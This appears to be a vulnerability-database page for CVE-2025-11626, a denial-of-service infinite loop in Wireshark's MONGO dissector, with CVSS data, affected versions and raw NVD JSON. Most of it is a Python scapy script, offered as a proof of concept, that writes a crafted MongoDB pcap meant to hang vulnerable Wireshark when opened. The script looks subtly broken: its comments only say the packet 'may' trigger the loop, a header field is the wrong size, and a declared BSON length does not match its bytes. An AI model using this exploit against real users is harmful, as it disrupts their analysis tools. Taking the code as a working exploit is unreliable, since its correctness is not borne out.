Security Vulnerability Report
CVE-2025-11626 CVSS 5.5 MEDIUM

Published: 2025-10-10 23:15:35
Last Modified: 2025-12-03 19:32:45

Description

MONGO dissector infinite loop in Wireshark 4.4.0 to 4.4.9 and 4.2.0 to 4.2.13 allows denial of service

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE (Wireshark >= 4.4.0, < 4.4.10)
cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE (Wireshark >= 4.2.0, < 4.2.14)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11626 PoC - Wireshark MONGO Dissector Infinite Loop
# This PoC demonstrates how to craft a malicious pcap file that triggers
# an infinite loop in the Wireshark MONGO dissector (versions 4.4.0-4.4.9 and 4.2.0-4.2.13)
import struct

from scapy.all import Ether, IP, TCP, Raw, wrpcap


def craft_mongo_malicious_packet():
    """
    Craft a malicious MongoDB Wire Protocol packet that triggers
    infinite loop in Wireshark's MONGO dissector.
    """
    # MongoDB Wire Protocol message header format:
    # - messageLength (4 bytes, little-endian int32)
    # - requestID (4 bytes)
    # - responseTo (4 bytes)
    # - opCode (4 bytes)
    # OP_MSG opcode = 2013
    op_code = 2013

    # Construct message body that causes infinite loop in dissector
    # The key is to craft a message with nested structures that
    # cause the parser to loop indefinitely
    msg_body = b'\x00'  # flagBits

    # Section with kind 0 (body)
    msg_body += b'\x00'

    # Craft a document with recursive-like structure
    # BSON document that may trigger infinite parsing loop
    bson_doc = b'\x10\x00\x00\x00'   # document length
    bson_doc += b'\x03'              # type: document
    bson_doc += b'\x61\x00'          # key: "a"
    bson_doc += b'\x0e\x00\x00\x00'  # nested doc length
    bson_doc += b'\x03'              # type: document
    bson_doc += b'\x62\x00'          # key: "b"
    bson_doc += b'\x05\x00\x00\x00'  # innermost doc
    bson_doc += b'\x00'              # null terminator
    bson_doc += b'\x00'              # null terminator
    msg_body += bson_doc

    # Total message length = header(16) + body
    msg_length = 16 + len(msg_body)

    # Construct full MongoDB message
    header = struct.pack('<I', msg_length)  # messageLength
    header += struct.pack('<I', 1)          # requestID
    header += struct.pack('<I', 0)          # responseTo
    header += struct.pack('<I', op_code)    # opCode

    mongo_packet = header + msg_body
    return mongo_packet


def create_poc_pcap(filename='cve_2025_11626.pcap'):
    """
    Create a pcap file with the malicious MongoDB packet.
    When opened with vulnerable Wireshark (4.4.0-4.4.9 or 4.2.0-4.2.13),
    it will trigger an infinite loop in the MONGO dissector.
    """
    mongo_data = craft_mongo_malicious_packet()

    # Wrap in Ethernet/IP/TCP frame to simulate MongoDB traffic
    # Default MongoDB port is 27017
    pkt = Ether(dst='00:00:00:00:00:00', src='00:00:00:00:00:00') / \
        IP(src='192.168.1.1', dst='192.168.1.2') / \
        TCP(sport=12345, dport=27017) / \
        Raw(load=mongo_data)

    wrpcap(filename, [pkt])
    print(f"[+] PoC pcap file created: {filename}")
    print(f"[+] Open this file with vulnerable Wireshark to trigger CVE-2025-11626")


if __name__ == '__main__':
    create_poc_pcap()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11626", "sourceIdentifier": "[email protected]", "published": "2025-10-10T23:15:35.207", "lastModified": "2025-12-03T19:32:45.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MONGO dissector infinite loop in Wireshark 4.4.0 to 4.4.9 and 4.2.0 to 4.2.13 allows denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.14", "matchCriteriaId": "E919B357-3B17-4C7D-AC1A-C519EA7876C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.10", "matchCriteriaId": "CAC73AB6-C303-43F8-9C04-8A1626C810D2"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/issues/20724", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2025-04.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}